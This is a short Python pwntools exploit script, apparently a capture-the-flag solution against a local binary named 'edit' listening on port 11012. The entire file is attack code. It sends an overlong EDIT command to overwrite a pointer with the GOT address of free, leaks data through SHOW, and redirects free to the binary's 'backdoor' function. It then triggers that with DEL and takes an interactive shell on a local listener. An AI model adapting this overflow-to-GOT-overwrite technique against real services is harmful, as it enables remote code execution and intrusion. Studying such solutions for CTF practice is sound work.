#!/usr/bin/env python3
# -*- coding:utf-8 -*-

from pwn import *
context.clear(arch='amd64', os='linux', log_level='debug')

elf = ELF('./edit')

sh = listen(12012)

tcpClient = remote('127.0.0.1', 11012)
tcpClient.sendline(b'ADD aaaa')
tcpClient.close()
print("successfully add")

tcpClient = remote('127.0.0.1', 11012)
tcpClient.sendline(b'EDIT aaaa ' + b'a' * 256 + p64(elf.got['free']))
tcpClient.close()
print(hex(elf.got['free']))
print("successfully edit")

tcpClient = remote('127.0.0.1', 11012)
tcpClient.sendline(b'SHOW')
content = tcpClient.recvuntil('a'*0x100)
print(b"content ==> " + content)
index_str = tcpClient.recvline()[:-1]
second_str = tcpClient.recvline()[:-1]
tcpClient.close()
# print("index_str == " + hex(int(index_str,16)))
print(b"index_str == " + index_str)
print(b"second_str == " + second_str)

print("successfully show")

tcpClient = remote('127.0.0.1', 11012)
tcpClient.sendline(b'EDIT ' + second_str + b' ' + p64(elf.sym['backdoor']))
tcpClient.close()
print("successfully edit")

tcpClient = remote('127.0.0.1', 11012)
tcpClient.sendline(b'DEL ' + p64(elf.sym['backdoor'])[:3])
tcpClient.close()
print(hex(elf.sym['backdoor']))

sh.interactive()